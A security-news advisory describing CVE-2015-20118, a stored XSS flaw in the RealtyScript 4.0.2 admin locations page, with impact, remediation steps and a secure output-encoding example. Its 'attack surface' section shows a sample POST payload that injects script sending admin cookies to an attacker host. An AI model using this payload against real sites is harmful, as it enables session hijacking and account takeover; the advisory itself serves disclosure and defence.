Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsStudyTraining
ProjectsChecklistsAI RankingsNewsletterStatusTagsAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Study
Training
Projects
Checklists
AI Rankings
Newsletter
Status
Tags
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

429+ Articles
114+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2015-20118: Stored XSS in RealtyScript 4.0.2 Admin Interface
CVE-2015-20118: Stored XSS in RealtyScript 4.0.2 Admin Interface
SECURITYHIGHCVE-2015-20118

CVE-2015-20118: Stored XSS in RealtyScript 4.0.2 Admin Interface

A stored cross-site scripting vulnerability in RealtyScript 4.0.2 allows attackers to inject malicious JavaScript via the location_name parameter in the...

Dylan H.

Security Team

March 17, 2026
4 min read

Affected Products

  • RealtyScript 4.0.2 (Next Click Ventures)

CVE-2015-20118: Stored XSS in RealtyScript 4.0.2 Admin Panel

A stored cross-site scripting (XSS) vulnerability originally discovered in 2015 has been formally catalogued by the NVD as CVE-2015-20118, carrying a CVSS score of 7.2 (High). The flaw resides in RealtyScript 4.0.2, a PHP-based real estate listing management platform developed by Next Click Ventures.

The vulnerability allows an attacker with access to the admin interface to inject persistent JavaScript payloads via the location_name parameter in the locations.php endpoint. Because the payload is stored server-side and rendered each time the admin panel loads, every subsequent admin session is exposed to the malicious script.


Vulnerability Overview

AttributeValue
CVE IDCVE-2015-20118
CVSS Score7.2 (High)
CWE ClassificationCWE-79 — Improper Neutralization of Input During Web Page Generation (Stored XSS)
Affected SoftwareRealtyScript 4.0.2 (Next Click Ventures)
Attack VectorNetwork
Authentication RequiredYes (admin interface access)
NVD PublishedMarch 16, 2026
Original Flaw Discovery2015

Technical Details

The vulnerability exists in the admin locations interface of RealtyScript 4.0.2. When an admin creates or edits a location entry, the location_name field value is stored in the database and later rendered into HTML pages without proper output encoding. This allows an attacker to embed JavaScript that executes in the browser of any admin who subsequently views the locations panel.

Attack surface:

POST /admin/locations.php
Content-Type: application/x-www-form-urlencoded

location_name=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>&...

Successful exploitation can allow an attacker to:

  • Steal admin session cookies — redirecting cookie contents to an attacker-controlled server
  • Perform actions as the admin — submitting forms, modifying listings, or creating new accounts
  • Maintain persistent access — the payload executes every time any admin visits the locations section
  • Pivot to further attacks — using admin privileges to modify listing data or plant additional backdoors in the CMS

Context and Impact

RealtyScript is a self-hosted PHP real estate listing platform. While legacy and unlikely to be actively maintained in 2026, instances of version 4.0.2 may still be running on forgotten or unpatched web servers — a common risk with commercial PHP CMS platforms from the mid-2010s.

Who is affected:

  • Any organization still running RealtyScript 4.0.2 without patching or migrating to a supported alternative
  • Real estate agencies or property listing sites that deployed the software and have not audited their stack since its initial setup

Practical risk: The late NVD publication reflects the ongoing cataloguing effort for older vulnerabilities. The real-world exposure window is narrow, but stored XSS in admin panels represents a meaningful risk: a single exploited session can grant full application control. Any externally accessible instances should be treated as at-risk.


Remediation

  1. Upgrade or decommission — RealtyScript 4.0.2 is no longer actively maintained; migrate to a supported real estate platform or take the installation offline
  2. Apply output encoding — any custom forks or derivative installations should encode all user-supplied values before rendering them in HTML contexts using htmlspecialchars() or equivalent
  3. Implement Content Security Policy (CSP) — a strict CSP header can block inline script execution, mitigating the impact of stored XSS payloads even if they are injected
  4. Audit the database — inspect existing location_name values in the database for stored payloads; sanitize or remove any suspicious entries
  5. WAF rules — deploy a web application firewall to detect and block XSS patterns submitted to admin endpoints

Secure coding pattern:

// Vulnerable pattern — raw output
echo "<td>" . $row['location_name'] . "</td>";
 
// Secure pattern — output encoding
echo "<td>" . htmlspecialchars($row['location_name'], ENT_QUOTES, 'UTF-8') . "</td>";

Key Takeaways

  1. CVE-2015-20118 is a stored XSS flaw in RealtyScript 4.0.2, now formally catalogued by NVD with CVSS 7.2 (High)
  2. Admin-accessible — the payload is injected via the location_name field in locations.php and persists in the database
  3. Stored XSS is more dangerous than reflected XSS — every admin session that loads the locations panel is exposed after a single injection
  4. Legacy software risk — the flaw is from 2015; running unmaintained PHP CMSs is a common attack surface on forgotten servers
  5. Remediation: Decommission or upgrade; apply output encoding; add a Content Security Policy

Sources

  • CVE-2015-20118 — NIST NVD
#CVE-2015-20118#Cross-Site Scripting#XSS#NVD#PHP#Web Security#Vulnerability

Related Articles

CVE-2015-20115: RealtyScript 4.0.2 Stored XSS via File Upload in Admin Panel

CVE-2015-20115 is a stored cross-site scripting vulnerability in RealtyScript 4.0.2 that allows authenticated attackers to upload malicious script files...

5 min read

CVE-2026-3730: SQL Injection in itsourcecode Free Hotel

A remotely exploitable SQL injection vulnerability has been disclosed in itsourcecode Free Hotel Reservation System 1.0, affecting the amenities admin...

5 min read

CVE-2026-3734: Improper Authorization in SourceCodester

A remotely exploitable improper authorization vulnerability has been disclosed in SourceCodester Client Database Management System 1.0, allowing...

5 min read
Back to all Security Alerts